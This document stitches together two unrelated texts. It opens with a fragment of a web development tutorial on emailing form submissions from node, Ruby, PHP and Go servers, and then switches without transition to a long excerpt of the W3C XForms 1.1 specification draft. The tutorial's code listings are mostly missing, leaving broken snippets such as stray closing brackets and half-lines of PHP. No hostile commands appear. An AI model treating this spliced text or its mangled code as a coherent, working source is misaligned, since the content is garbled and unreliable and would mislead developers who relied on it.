With these changes, your goPress server can now send your emails from the user.
Processing the Form With nodePress
To send emails from node, you will need to first install the nodemailer library and the body-parser library with the following command line:
npm install -save nodemailer npm install -save body-parser
Then you need to load the new libraries and configure the mailer object. At the top of the
nodePress.js file, after the last library loaded, add these lines:');
This will load the nodemailer library and set up the reusable component for sending emails. You have to replace
<your email name> with the name of your email address (i.e. before the @ symbol),
<your email domain> is the domain for your email address (i.e. gmail.com for normal gmail or your domain name if you have gmail set up on your domain name), and
After the line that initializes the nodePress variable, add this code:
// // Configure the body parser library. // nodePress.use(bodyParser.urlencoded({ extended: true }));
Now, after the last
nodePress.get() function call, add this code:")); }); });
This is the handler for the
/api/message address. This function gets the information sent from the form, creates the proper email message, and sends it to the email address given in
<your email address>. After sending the email, it will send the user to the
/messagesent page. The body parser middleware has the url parameters saved into the
request.body variable and properly sanitized.
This code works for Gmail setup without two-factor authentication. If you have two-factor authentication, you can refer to the Nodemailer documentation to set it up.
Processing the Form With rubyPress
To send emails in Ruby, you will need to install the ruby-gmail library with the following command line:
gem install ruby-gmail
Depending on your Ruby setup, you might need to use
sudo in front of the command. Now to load the library, add the following line to the top of the
rubyPress.rb file:
require 'gmail' #
After all the
get definitions, add the following lines:
With these additions, your rubyPress server can process email forms. Once you change
<your email address> to your email address and
<your password> to the password for your email server, the script is finished.
Processing the Form With phpPress
The last server to modify is the phpPress server. To add email capabilities to the server, I am going to install the phpmailer library. This is the most widely used library in PHP for working with emails. To install the library, you need to run these command-line commands in the phpPress directory:
composer update composer require phpmailer/phpmailer
Unfortunately, the composer update will update the LightnCandy library. This is good because it is much faster and easier to use. But it breaks the server code. In the index.php file, locate the
ProcessPage() function and replace it with the following code:
// //); }
Comparing it with the older code, you no longer have to work with a temporary file. It is all done in memory and is therefore much faster. Now, at the top of the
index.php file, add this after the Jade library:
// // PHP Mailer: // require 'vendor/phpmailer/phpmailer/PHPMailerAutoload.php';
This loads the phpmailer library. Now, after the last
$app->get() function, add this code:
// //->Subject = "Message from $Name"; $mail->Body = $Message; if(!$mail->send()) { echo 'Message could not be sent.'; echo 'Mailer Error: ' . $mail->ErrorInfo; } else { $newResponse = SetBasicHeader($response); $newResponse->getBody()->write(page('messagesent')); return($newResponse); } });
This is a post request handler for the
/api/message path. It retrieves the form data sent from the browser, creates an email with it, and sends the email. PHP automatically takes any URL parameters and places them in the global array
You will have to replace
<your name> with the appropriate values for your email. If you are using something other than a Gmail SMTP server, you will need to change the
$mail->Host address as well.
Conclusion.
The method I taught here is by posting form data with the data in the URL. Many sites nowadays use a REST API with the data in a JSON.
Envato Tuts+ tutorials are translated into other languages by our community members—you can be involved too!Translate this post
| https://code.tutsplus.com/tutorials/processing-forms-with-phppress-gopress-rubypress-and-nodepress--cms-27473 | CC-MAIN-2020-29 | refinedweb | 1,587 | 65.52 |
Coz it's fun!
Discussions
Ignore this. I found that I can use "this" in the constructor - I was trying to work out of methods, id est:
public class Whatever
{
private CustomList<x> = new CustomList(this);
}
This seems incredibly basic. I have a class and I want it to pass itself in a method, to set itself as an owner of a subclass.
How do you do this?
- spoofnozzle wrote.
For the price of the Playstation 3 you will be able to purchase both the XBox and Wii (wtf?) consoles.
See here:
This doesn't seem to have been getting an awful lot of attention!
Wakey, wakey, those who have access to Wallop.
I opened the Web Designer.
I closed Web Designer.
I opened Dreamweaver.
And that, my friends, is really all there is to it - although I'll give it another shot when I'm not layed down with homework.
I am working on an experimental audio format in C#. Well: step one: communicate with the Windows Audio Stack. How can you impliment this?
IsFile even returns false for "file://" protocol URIs? | https://channel9.msdn.com/Niners/Khamul/Discussions | CC-MAIN-2015-32 | refinedweb | 183 | 77.13 |
Introduction
Embedding Video Players using pure HTML5 video technology can enhance Web page aesthetics and overall user experience. YouTube is the most popular video sharing websites in the world. That’s why, as with many popular Google services, YouTube also has a Data API. The YouTube API allows developers to interact with this service. By using this API, developers can query videos, search videos, and upload videos on YouTube.
In this article, I will demonstrates the coding technique for playing a YouTube video using an embed link. I will also demonstrate an example to consume the YouTube API to get a list of videos from a channel.
Playing Embedded YouTube Videos in ASP.NET MVC
YouTube allows developers to retrieve the embed code of a video published in a YouTube channel. To get the embed code, you need to visit YouTube and find a video which you want to display. Copy the URL which is displayed in the browser address bar.
The following URL is a sample embedded YouTube video link:.
To demonstrate the YouTube embed video feature from ASP.NET, I have created an MVC application from Visual Studio.
In the MVC application, I have appended the ID of the YouTube video with YouTube embed video URL, which is ultimately assigned to HTML IFRAME element in ASP.NET MVC Razor.
In the MVC View, I have added an HTML TextBox, a Button, and an IFRAME element.
The Button has been assigned to a jQuery click event handler. During the Button click event, first the YouTube Video URL will be fetched from the TextBox, and then YouTube Video ID is extracted from the URL.
The preceding extracted YouTube Video ID will be appended to the YouTube embed video URL. Finally, the URL is set to the SRC property of the HTML IFRAME element for audience view. The following code snippet explains the HTML view.
@{ Layout = null; } <!DOCTYPE html> <html> <head> <meta name="viewport" content="width=device-width" /> <title>Sample YouTube Embed Video Example</title> </head> <body> <input type="text" id="YoutubeUrl" style="width:300px" /> <input type="button" id="PlayVideo" value="Play" /> <hr /> <iframe id="YouTubevideo" width="420" height="315" frameborder="0" style="display:none" allowfullscreen></iframe> <script type="text/javascript" src=" /jquery.min.js"></script> <script type="text/javascript"> $("body").on("click", "#PlayVideo", function () { var url = $("#YoutubeUrl").val(); url = url.split('v=')[1]; $("#YouTubevideo")[0].src = "//" + url; $("#YouTubevideo").show(); }); </script> </body> </html>
The following MVC Controller code consists of an Action method named Index. Inside this Action method code, I have simply returned the View.
public class HomeController : Controller { public ActionResult Index() { return View(); } }
Consuming the YouTube API
Google provides a YouTube Data API. This API allows developers to interact with the YouTube service and create various applications. To interact with YouTube API, you have to create a key.
To create a Google API key, follow these steps.
Step 1
You need to create an account in Google if you don’t have one already. Once the account is created, next you should navigate to Google Developers Console Web site, as shown in Figure 1.
Figure 1: Enabling the YouTube Data API
Next, you should create a new project. I have already created a project named ‘MyCoolProject’ shown in the previous example.
Next, click the “Enable” button. This will lead you to a new page where you can enable all needed APIs.
Step 2
On the next page, enable “YouTube Data API v3” and “YouTube Analytics API.” In Figure 2, you can see YouTube Data API v3 is enabled.
Figure 2: YouTube Data API Statistics
Step 3
Generate the API key by clicking the ‘Credentials’ link. We will use the generated API Key in code (see Figures 3 and 4).
Figure 3: Generating a Data API Key
Figure 4: Data API Key Generated
Step 4
Now, Create an ASP.NET MVC application from Visual Studio. Open NuGet Console and search for “Google.Apis.YouTube.v3.’ Install that package, as shown in Figure 5.
Figure 5: Installing the ‘Google.Apis.YouTube.v3’ NuGet Package
Once all packages are installed, the following Google and YouTube specific assemblies will be added to the reference folder (see Figure 6).
Figure 6: References are added in the Project
Step 5
Next, create a new class, YouTubeVideo, and add it to the YouTube API.
The following GetVideos function is added to the YouTubeVideo class that returns all the videos (objects of the MyYouTubeVideoObject class) of a specific channel. I have used the API created in the previous step for calling the YouTube API.
namespace YouTubeAPISample { public class MyYouTubeVideoObject { public string VideoId { get; set; } public string Title { get; set; } } public class YouTubeVideo { const string MYYOUTUBE_CHANNEL = "SampleChannel"; const string MyYOUTUBE_DEVELOPER_KEY = "AIzaSyDsCC8-hnOokLB2qsBq3WnJXQ_9poKOBus"; public static MyYouTubeVideoObject[] GetVideos() { YouTubeRequestSettings settings = new YouTubeRequestSettings("SampleChannel", MyYOUTUBE_DEVELOPER_KEY); YouTubeRequest request = new YouTubeRequest(settings); string feedUrl = String.Format ("{0} /uploads?orderby=published", MYYOUTUBE_CHANNEL); Feed<Video> videoFeed = request.Get<Video> (new Uri(feedUrl)); return (from video in videoFeed.Entries select new MyYouTubeVideoObject() { VideoId = video.VideoId, Title = video.Title }) .ToArray(); } } }
Conclusion
I hope this article explains how to interact with the YouTube service to display videos from a YouTube channel. You can use the the preceding codebase to display a video list in your Web site. The YouTube data API provides a rich set of features to interact with YouTube. That’s all for today. Happy coding! | https://www.codeguru.com/dotnet/playing-a-youtube-video-in-an-asp-net-application/ | CC-MAIN-2021-43 | refinedweb | 890 | 66.33 |
Wenqian Zheng2,286 Points
Package 1 of 4
In the task 'Let's create some code for the Example company. They own the domain example.com. Place the BlogPost.java file in the proper package by using the package keyword.'
I typed in package com.example;
and I kept get the wrong message:'JavaTester.java:65: error: illegal start of expression package com.example'
Could someone please tell me what to do? Thanks a lot!
package com.example;
public class Display { public static void main(String[] args) { // Your code here... } }
1 Answer
Aleksander Henriksen3,059 Points
Hello.
You have done everything right, it's just the tracks in TreeHouse that have some Errors. Just keep moving on, at your track, and skip the assignments till they have fixed the problem.
Wenqian Zheng2,286 Points
Wenqian Zheng2,286 Points
Thanks a lot. I'm kinda confused but I did move on. :) | https://teamtreehouse.com/community/package-1-of-4 | CC-MAIN-2020-40 | refinedweb | 150 | 70.9 |
2007 W3C® (MIT, ERCIM, Keio), All Rights Reserved. W3C liability, trademark and document use rules apply.
XForms is an XML application that represents the next generation of forms for the Web. XForms is not a free-standing document type, but is intended to be integrated into other markup languages, such as XHTML, ODF W3C Forms Working Group as part of the Forms Activity within the W3C Interaction Domain.
This document is a W3C Candidate Recommendation.. Publication as a Candidate Recommendation does not imply endorsement by the W3C Membership. This is a draft document and may be updated, replaced or obsoleted by other documents at any time. It is inappropriate to cite this document as other than work in progress.
The results of the public last call review of XForms 1.1 are presented in this last call comments report. There are no features at risk. The working group has prepared a preliminary implementation report to outline present and expected implementations of XForms 1.1. Also note that XForms 1.1 is based on XForms 1.0, which is widely implemented and deployed. For a description of the differences between XForms 1.1 and 1.0, see Section 1.5 Differences between XForms 1.1 and XForms 1.0.
Please send comments about this document to www-forms-editor@w3.org. (with public archive). Please send discussion email to www-forms Specification
1.1 Background
1.2 Reading the Specification
1.3 How the Specification is Organized
1.4 Documentation Conventions
1.5 Differences between XForms 1.1 and XForms 1.0
1.5.1 Model and Instance
1.5.2 Enhanced Submissions
1.5.3 Datatypes and Model Item Properties
1.5.4 Functions and XPath Expressions
1.5.5 User Interface
1.5.6 Actions and Events
2 Introduction to XForms
2.1 An Example
2.2 Providing XML Instance Data
2.3 Constraining Values
2.4 Multiple Forms per Document
3 Document Structure
3.1 Namespace for XForms Extension Module
3.4.1 The extension Element
3.5 The XForms MustUnderstand Module-rebuild Event
4.3.2 The xforms-recalculate Event
4.3.3 The xforms-revalidate Event
4.3.4 The xforms-refresh Event
4.3.5 The xforms-reset Event
4.3.6 The xforms-next and xforms-previous Events
4.3.7 The xforms-focus Event
4.3.8 The xforms-help and xforms-hint Events
4.3.9 The xforms-submit Event
4.3.10 The xforms-submit-serialize Event
4.4 Notification Events
4.4.1 The xforms-insert Event
4.4.2 The xforms-delete Event
4.4.3 The xforms-value-changed Event
4.4.4 The xforms-valid Event
4.4.5 The xforms-invalid Event
4.4.6 The xforms-readonly Event
4.4.7 The xforms-readwrite Event
4.4.8 The xforms-required Event
4.4.9 The xforms-optional Event
4.4.10 The xforms-enabled Event
4.4.11 The xforms-disabled Event
4.4.12 The DOMActivate Event
4.4.13 The DOMFocusIn Event
4.4.14 The DOMFocusOut Event
4.4.15 The xforms-select and xforms-deselect Events
4.4.16 The xforms-in-range Event
4.4.17 The xforms-out-of-range Event
4.4.18 The xforms-scroll-first and xforms-scroll-last Events
4.4.19 The xforms-submit-done Event
4.5 Error Indications
4.5.1 The xforms-binding-exception Event
4.5.2 The xforms-compute-exception Event
4.5.3 The xforms-link-error Event
4.5.4 The xforms-link-exception Event
4.5.5 The xforms-output-error Event
4.5.6 The xforms-submit-error Event
4.5.7 The xforms-version
4.7 Resolving ID References in XForms
4.7.1 References to Elements within a repeat Element
4.7.2 References to Elements within a bind Element
4.8 DOM Interface for Access to Instance Data
4.8.1 The getInstanceDocument() Method
4.8.2 The rebuild() Method
4.8.3 The recalculate() Method
4.8.4 The revalidate() Method
4.8.5 The refresh() Method
4.9 Feature string for the hasFeature method call
5 Datatypes
5.1 XML Schema Built-in Datatypes
5.2 XForms Datatypes
5.2.1 Additional XForms Datatypes to Allow Empty Content
5.2.2 xforms:listItem
5.2.3 xforms:listItems
5.2.4 xforms:dayTimeDuration
5.2.5 xforms:yearMonthDuration
5.2.6 xforms:email
5.2.7 xforms:card-number Evaluation Context
7.3 References, Dependencies, and Dynamic Dependencies
7.4 Expression Categories
7.4.2 Model Binding Expressions and Computed Expressions
7.4.3 Expressions in Actions and Submissions
7.4.4 UI Expressions
7.4.5 UI Binding in other XML vocabularies
7.4.6 Binding Examples
7.5 The XForms Function Library
7.6 Boolean Functions
7.6.1 The boolean-from-string() Function
7.6.2 The is-card-number() Function
7.7 Number Functions
7.7.1 The avg() Function
7.7.2 The min() Function
7.7.3 The max() Function
7.7.4 The count-non-empty() Function
7.7.5 The index() Function
7.7.6 The power() Function
7.7.7 The random() Function
7.7.8 The compare() Function
7.8 String Functions
7.8.1 The if() Function
7.8.2 The property() Function
7.8.3 The digest() Function
7.8.4 The hmac() Function
7.9 Date and Time Functions
7.9.1 The local-date() Function
7.9.2 The local-dateTime() Function
7.9.3 The now() Function
7.9.4 The days-from-date() Function
7.9.5 The days-to-date() Function
7.9.6 The seconds-from-dateTime() Function
7.9.7 The seconds-to-dateTime() Function
7.9.8 The adjust-dateTime-to-timezone() Function
7.9.9 The seconds() Function
7.9.10 The months() Function
7.10 Node-set Functions
7.10.1 The instance() Function
7.10.2 The current() Function
7.10.3 The id() Function
7.10.4 The context() Function
7.11 Object Functions
7.11.1 The choose() Function
7.11.2 The event() Function
7.12 Extension Functions
8 Core Form Controls
8.1 The XForms Core Form Controls Module
8.1.1 Implementation Requirements Common to All Form Controls
8.1.2 The input Element
8.1.3 The secret Element
8.1.4 The textarea Element
8.1.5 The output Element
8.1.5.1 The mediatype Element (for output)
8.1.6 The upload Element
8.1.6.1 The filename Element
8.1.6.2 The mediatype Element (for upload)
8.1.7 The range Element
8.1.8 The trigger Element
8.1.9 The submit Element
8.1.10 The select Element
8.1.11 The select1 Element
8.2 Common Support Elements
8.2.1 The label Element
8.2.2 The help Element
8.2.3 The hint Element
8.2.4 The alert Element
8.3 Common Markup for Selection Controls
8.3.1 The choices Element
8.3.2 The item Element
8.3.3 The value Element
9 Container Form Controls
9.1 The XForms Group Module
9.1.1 The group Element
9.2 The XForms Switch Module
9.2.1 The switch Element
9.2.2 The case Element
9.3 The XForms Repeat Module
9.3.1 The repeat Element
9.3.2 Nested Repeats
9.3.3 Repeat Processing
9.3.4 User Interface Interaction
9.3.5 Creating Repeating Structures Via Attributes
9.3.6 The itemset Element
9.3.7 The copy Element
10 XForms Actions
10.1 The action Element
10.2 The setvalue Element
10.3 The insert Element
10.4 The delete Element
10.5 The setindex Element
10.6 The toggle Element
10.6.1 The case Element Child of the toggle Element
10.7 The setfocus Element
10.7.1 The control Element Child of the setfocus Element
10.8 The dispatch Element
10.8.1 The name Child Element
10.8.2 The target Child Element
10.8.3 The delay Child Element
10.9 The rebuild Element
10.10 The recalculate Element
10.11 The revalidate Element
10.12 The refresh Element
10.13 The reset Element
10.14 The load Element
10.14.1 The resource Element child of load
10.15 The send Element
10.16 The message Element
10.17 Conditional Execution of XForms Actions
10.18 Iteration of XForms Actions
10.19 Actions from Other Modules
11 The XForms Submission Module
11.1 The submission Element
11.2 The xforms-submit Event
11.3 The xforms-submit-serialize Event
11.4 The xforms-submit-done Event
11.5 The xforms-submit-error Event
11.6 The Submission Resource
11.6.1 The resource Element
11.7 The Submission Method
11.7.1 The method Element
11.8 The header Element
11.8.1 The name Element
11.8.2 The value Element
11.9 Submission Options
11.9.1 The get Submission Method
11.9.2 The post, multipart-post, form-data-post, and urlencoded-post Submission Methods
11.9.3 The put Submission Method
11.9.4 The delete Submission Method
11.9.5 Serialization as application/xml
11.9.6 Serialization as multipart/related
11.9.7 Serialization as multipart/form-data
11.9.8 Serialization as application/x-www-form-urlencoded
11.10 Replacing Data with the Submission Response
11.11 Integration with SOAP
11.11.1 Representation of SOAP Envelope
11.11.2 Indicating a SOAP submission
11.11.3 SOAP HTTP Binding
11.11.4 Handling the SOAP Response
12 Conformance
12.1 Conforming XForms Documents
12.2 Conforming XForms Generators
12.3 Base Technologies for XForms Processors
12.4 Conformance Levels
12.4.1 XForms Model
12.4.2 XForms Full
13 Glossary Of Terms
A References
A.1 Normative References
A.2 Informative References
B Insert and Delete Action Patterns for Data Mutations
B.1 Prepend Element Copy
B.2 Append Element Copy
B.3 Duplicate Element
B.4 Set Attribute
B.5 Remove Element
B.6 Remove Attribute
B.7 Remove Nodeset
B.8 Copy Nodeset
B.9 Copy Attribute List
B.10 Replace Element
B.11 Replace Attribute
B.12 Replace Instance with Insert
B.13 Move Element
B.14 Move Attribute
B.15 Insert Element into Non-Contiguous, Heterogeneous Nodeset
C Recalculation Sequence Algorithm
C.1 Details on Creating the Master Dependency Directed Graph
C.2 Details on Creating the Pertinent Dependency Subgraph
C.3 Details on Computing Individual Vertices
C.4 Example of Calculation Processing
D Privacy Considerations
D.1 Using P3P with XForms
E Input Modes (Non-Normative)
E.1 inputmode Attribute Value Syntax
E.2 User Agent Behavior
E.3 List of Tokens
E.3.1 Script Tokens
E.3.2 Modifier Tokens
E.4 Relationship to XML Schema pattern facets
E.5 Examples
F Schema for XForms (Non-Normative)
F.1 Schema for XML Events
G XForms and Styling (Non-Normative)
G.1 Pseudo-classes
G.2 Pseudo-elements
G.3 Examples
H Complete XForms Examples (Non-Normative)
H.1 XForms in XHTML
H.2 Editing Hierarchical Bookmarks Using XForms
H.3 Survey Using XForms and SVG
I Acknowledgements (Non-Normative)
J Production Notes (Non-Normative)
Forms are an important part of the Web, and they continue to be the primary means for enabling interactive Web applications. must, must not, required, shall, shall not, recommended, should, should not, may, and optional an XML Schema description of XForms, references, examples, and other useful information.
Throughout this document, the following namespace prefixes and corresponding namespace identifiers are used:
xforms: The XForms namespace, e.g.(see 3.1 Namespace for XForms)
html: An XHTML namespace, e.g.(see [XHTML 1.0])
xs: The XML Schema namespace(see [XML Schema part 1])
xsd: The XML Schema namespace(see [XML Schema part additional commentary:
Note:
A gentle explanation to readers.
This informative section provides an overview of the new features and changed behaviors available in XForms 1.1.
The
model element now supports a
version attribute to help authors bridge the transition between XForms 1.0 to XForms 1.1.
The
instance element now has a
resource attribute that allows instance data to be obtained from a URI only if the instance
does not already contain data. By contrast, the
src attribute overrides the inline content in an
instance. The
resource
attribute is more useful in systems that must support save and reload of XForms-based documents.
The
submission element offers many new features that allow significantly improved data communications capabilities for XForms, including:
Access to SOAP-based web services, RESTful services, ATOM-based services, and non-XML services
Improved control over submission processing and serialization
Ability to control the submission URI and headers with instance data
Targetted instance data replacement capabilities
The
submission element now has a
resource attribute and
resource child element that allow the instance data to dynamically control
the submission URI. As a result, the
action attribute is deprecated, though still supported in XForms 1.1.
In XForms 1.0, submissions were already more capable than AJAX, based on the ability to automatically update a form with results from HTTP and HTTPS services, including RSS feeds.
In XForms 1.1, the
method attribute now supports
delete as well as any other QName.
The
method child element also allows the method to be dynamically controlled by instance data.
Submission headers can now be added, and even dynamically controlled by instance data, using the
header child element.
These features complete the capabilities needed for ATOM and RESTful services. XForms 1.1 also offers special submission header behavior through the
mediatype
attribute to allow communications with SOAP 1.1 and 1.2 web services.
The
submission element now supports attributes
relevant and
validate, which allow form authors to turn off instance data relevance pruning
and validity checking. This allows
submission to be used to save and reload unfinished data on a server or the local file system.
The
submission element now supports the
target attribute, which allows partial instance replacement by identifying a node to be replaced with the
submission result. The
replace attribute also now supports a
text setting, which allows the content of the target node, rather than the target node itself, to be
replaced with a non-XML (text) submission result.
The
submission element now also supports the
xforms-submit-serialize event, which allows the form author to provide a custom serialization,
such as plain text or the full XForms document, as the submission data. The
serialization attribute also provides increased control over the submission data
serialization, including the setting
none, which allows
submission to be used for simple URI activation.
The
xforms-submit-done and
xforms-submit-error events now have event context information available that provide more information
about both successful and failed submissions, such as the response headers of successful submissions and the reason code for failed submissions.
Finally, over a dozen new examples have been added to illustrate
submission usage.
XForms 1.1 now offers
card-number datatypes so form authors can easily validate email address and credit card number input values.
To further simplify authoring, XForms 1.1 now also provides its own definitions of the XML Schema datatypes, except the XForms versions permit the empty string. Allowing empty
string means that input like an age or a birthdate can be collected without being required input for validity (an empty string is not in the lexical space of XML schema datatypes like
xsd:positiveInteger and
xsd:date). If an input is required, the form author can still use the XForms versions of the datatypes in combination with the
required model item property. The XForms datatypes also aid authoring by allowing type definitions to omit namespace qualification, e.g.
type="date"
rather than
type="xsd:date", if the default namespace of the model is set to XForms.
The
readonly model item property was defined to be an inviolate property of the data model. This means it cannot be violated by anything outside of the model item property system,
including not just form controls but also XForms actions and instance data access from the DOM interface.
XForms 1.1 now contains many new functions that can be used in
calculate and other XPath expressions to enable numerous features, including:
basic date math and working with local dates and times:
local-date(),
local-dateTime(),
days-to-date(),
seconds-to-dateTime(), and
adjust-dateTime-to-timezone()
working with tabular data and parallel lists:
current(),
choose() and
context()
basic security capabilities:
digest(),
hmac(), and
random()
improved numeric and string processing:
power(),
is-card-number(), and
compare()
search across instances of a model: two parameter
id() function
access to context information added to many XForms events:
event()
The specification now provides a better classification of binding expression types as well as a more rigorous definition for dynamic dependencies.
These definitions ensure that XPath expressions in form controls and actions which use the
index() are automatically re-evaluated when appropriate.
Due to the addition of the
choose() function, the
if() function is still supported but deprecated as futureproofing against the
conflict with the
if keyword in XPath 2.0.
The behavioral description common to all form controls has been improved to indicate default layout styling and rendering requirements for required data.
The
output form control has been improved to render non-text mediatypes, particularly images, obtained from instance data.
An example was added to show the use of a
DOMActivate handler on an
input to automatically initiate a submission
once a user enters and commits input, such as a search query.
The processing model and implementation requirements on selection controls were elaborated upon to ensure consistency of behavior between selection data expressed as textual lists versus element lists.
The ability to create wizard-like interfaces with dynamically available form controls has been improved. Details are in the description of improvements to actions.
The specification provides more rigorous definitions and classifications of form controls, which have been applied throughout the specification to ensure proper support of varied features related to form controls, such as events, applicability of model item properties, and focusability.
The XForms repeat has been made more powerful and flexible. The specification now provides rigorous definitions and processing model descriptions for
repeated content, including creation, destruction, IDREF resolution and event flow between repeated content and the containing content (which may itself be repeated).
The
repeat is now capable of operating over any nodeset, not just an homogeneous collection. A formal processing model for repeat index handling has been defined.
The
insert and
delete actions have been converted from specialized actions associated with
repeat to generalized data insertion and
deletion operations. An entire appendix of 15 examples was added to illustrate this additional capability in detail.
All XForms actions, as well as sets of actions, can be executed conditionally or iteratively. Combined with the generalized
insert and
delete,
this means that the information processing power of XForms 1.1 is Turing-complete.
The
dispatch action now allows the event name and target to be specified by instance data. A new attribute,
delay, has also been added
to allow an event to be scheduled for dispatch at a later time. Since the event handler for the event can schedule same event for later dispatch, it is possible
in XForms 1.1 to create background daemon tasks.
The
setfocus and
toggle have been improved to help with creating wizard interfaces and handling dynamically available content.
The control to focus and the case to select can now be specified by instance data. These actions have also been improved relative to the recalculation processing model.
They now perform deferred updates before their regular processing to ensure the user interface is automatically refreshed.
As part of the improvement to repeat index management, the
setindex action now behaves more like
setvalue, which means it
now sets the flags for automatic recalculation, revalidation and user interface refresh. As well, this action now als performs deferred updates before its
regular processing to ensure the user interface is up to date.
Finally, the
setvalue action has been improved due to the addition of the
context() function. Now it is possible to express the
value attribute in terms of the same context node used to evaluate the single node binding. This improves the ability to use
setvalue
inside of a
repeat to set values of instance nodes that are outside of the repeat nodeset based on values that are within the repeat nodeset..
Core, the
relevant expression uses absolute XPath notation (beginning with
/) because the evaluation context nodes for computed expressions are determined by the binding expression (see 7.2 H Complete XForms Examples.
XForms namespace URI for XForms is. The XForms schema has the target namespace specified and as such is compatible with the XForms 1.0 definition.
<switch xmlns=""> example is unchanged from the specification in XForms 1.0 (in the example, the prefixes html and ev are defined by an ancestor of the
switch element).
The Common Attribute Collection applies to every element in the XForms namespace.
Foreign attributes are allowed on all XForms elements.
The optional
id attribute of type
xsd:ID assigns an identity to the containing element.
Note:
Elements can be identified using any attribute of type ID (such as
xml:id), not just the
id attribute defined above.-exception or xforms-link-error to the
model associated with the in-scope evaluation context node of the element that bears the Linking
Attributes Collection for the failed link.
Note:
Section 3.3.2 The instance Element defines attribute
src for the
instance element.
The following attributes can be used to define a binding between an XForms element such as a form control or an action and an instance data node defined by Single-Node Binding, then the Single-Node Binding is required unless the element explicitly states that it is optional.
In some cases, an XForms element may allow a Single-Node Binding, but one or more attributes in the Single-Node Binding attribute group are inappropriate for that XForms element. In such cases, the exact attributes are listed for the XForms element, but those attributes still express a Single-Node Binding if they appear in the element. For example, the
submission element forbids the
model attribute because the model is defined to be the one containing the
submission, so the attributes
ref and
bind are listed for
submission rather than referring to the Single-Node Binding attribute group, but if a
ref or
bind attribute is used on a
submission, it does express a Single-Node Binding.
When the Single-Node Binding is required, one of
ref or
bind is required.
When
bind is used, the node is determined by the referenced
bind.
See 4.7.2 References to Elements within a bind Element for details on selecting an identified
bind that is iterated by one or more containing
bind elements.
When
ref is used, the node is determined by evaluating the XPath expression with the evaluation context described in Section 7.2 Evaluation Context.
First-node rule: When a Single-Node Binding attribute selects a node-set of size > 1, the first node in the node-set, based on document order, is used..
The following attributes define a binding between an XForms element such as a form control or an action and a node-set defined by Node-Set Binding, then the Node-Set Binding is required unless the element explicitly states that it is optional.
In some cases, an XForms element may allow a Node-Set Binding, but one or more attributes in the Node-Set Binding attribute group are inappropriate for that XForms element. In such cases, the exact attributes are listed for the XForms element, but those attributes still express a Node-Set Binding if they appear in the element. For example, the
bind element only allows the
nodeset attribute. The
model and
bind attributes are not allowed on a
bind element, but if the
nodeset attribute appears on a
bind element, it does express a Node-Set Binding.
When the Node-Set Binding is required, one of
nodeset or
bind is required.
When
bind is used, the node-set is determined by the referenced
bind.
See 4.7.2 References to Elements within a bind Element for details on selecting an identified
bind that is iterated by one or more containing
bind elements. When
nodeset is used, the node-set is determined by evaluating the XPath expression with the evaluation context described in Section 7.2 Evaluation Context..5 The XForms MustUnderstand Module rules.
Note that the presence of foreign namespaced elements is subject to the definition of the containing or compound.
The schema definitions for a namespace are determined to be applicable to instance nodes based on an instance schema validation episode initialized to lax processing. When an element lacks a schema declaration, the XML Schema specification defines the recursive checking of children and attributes as optional. For this specification, this recursive checking is required. Schema processing for a node with matching schema declarations is governed by its content processing definition, which is strict by default.
Note:
The
schema list may include URI fragments referring to elements located outside the current model elsewhere in the
containing document; e.g.
"#myschema".
xs:schema elements located inside the current model need not be listed.
Optional attribute with a default value of empty string and legal values defined by the datatype xforms:versionList. Examples are
"1.0" and
"1.0 1.1". If one or more versions are indicated by this attribute on the default
model, then an XForms Processor must support at least one of the listed language versions of XForms. Otherwise, the XForms Processor must terminate processing after dispatching the event xforms-version-exception to the default
model. If the XForms Processor supports more than one language version indicated by the version setting on the default
model or if the version setting on the default
model is empty string (whether specified or by default), then the XForms Processor may execute the XForms content using any language conformance level available to it. If any non-default
model has a version setting that is incompatible with the language version selected by the XForms Processor, default
model, or if any
model contains an illegal
version attribute value, then the XForms Processor must terminate processing after dispatching the event xforms-version-exception to the default
model.
Note:
Since documents that conform to [XForms 1.0] are required to be XForms schema valid, and XForms 1.1 features including the
version
attribute would violate the XForms 1.0 schema, an XForms 1.0 Processor may not correctly process an XForms 1.1 document. Implementers of XForms 1.0
processors are encouraged to check for the
version in order to more gracefully report potential compatibility issues with XForms 1.1 documents.
Examples:
model, with the XForms namespace defaulted:
<model id="Person" schema="MySchema.xsd"> <instance resource="" /> ... </model>
<model> <message level="modal" ev: ... </model> ... <model id="m2" version="1.1"> ... </model>
Since the
version attribute is not specified on the
model, the XForms Processor may choose any language conformance level, which may be incompatible with the version setting of the second
model. default of 1.0 is used, so the
message action is performed if the XForms Processor does not support 1.0-specific behaviors in its processing of the XForms vocabulary. Otherwise, Therefore, the message action occurs during initialization of the second
model due to its version conflict incompatibility with the default
model.
<model version="1.0 1.1"> ... </model> ... <model id="m2"> ... </model>
Since the
version attribute is not specified on the second
model, it is compatible with any choice made based on the version setting on the default model.
This optional element contains or references initial instance data.
Common Attributes: Common
Special Attributes:
Optional link to externally defined initial instance data. If the link traversal fails, it is treated as an exception (4.5.4 The xforms-link-exception Event).
Optional link to externally defined initial instance data. If the link is traversed and the traversal fails, it is treated as an exception (4.5.4 The xforms-link-exception Event).
If the
src attribute is given, then it takes precedence over inline content and the
resource attribute, and the XML data for the instance is obtained from the link. If the
src attribute is omitted, then the data for the instance is obtained from inline content if it is given or the
resource attribute otherwise. If both the
resource attribute and inline content are provided, the inline content takes precedence.
If both the
resource attribute and inline content are provided, the inline content takes precedence as described at 4.2.1 The xforms-model-construct Event. The host language may also specify an external link for the instance data using a linking attribute. The content obtained from a linking attribute may override the inline content, just the
resource attribute or neither. The host language may treat failure to traverse the link as an exception (4.5.4 The xforms-link-exception Event). XPath data model for the instance data fails due to an XML error, then processing halts after dispatching an xforms-link-exception
with a
resource-uri indicating either the URI for an external instance, a barename fragment identifier URI reference (including the leading # mark) for an identified internal instance, or empty string for an unidentified internal instance.
This exception could happen, for example, if the content had no top-level element or more than one top-level element, neither of which is permitted by the grammar of XML. which is not permitted since an XML document cannot have more than one document element.
Note:
All data relevant to the XPath data model must be preserved during processing and as input to submission serialization, including processing instructions, comment nodes and all whitespace.
Note:
XForms authors who need additional control over the serialization of namespace nodes can use the
includenamespaceprefixes attribute on the
submission element.
Details about the
submission element and its processing are described in 11 The XForms Submission Module.
Element
bind selects a node-set (Optional)
Special Attributes:
An optional attribute containing a model binding expression that selects the set of nodes on which this
bind operates.
See 6 Model Item Properties for details on model item properties.
See 7.2 Evaluation Context for details on how the evaluation context is determined for each attribute of the
bind section is deleted. are loaded. If an error occurs while attempting to access or process a remote document, processing halts with an exception (4.5.4 The xforms-link-exception Event).
For each
instance element, if inline initial instance data is given, then
an XPath data model [7 XPath Expressions in XForms] is constructed from it as described in Section 3.3.2 The instance Element.
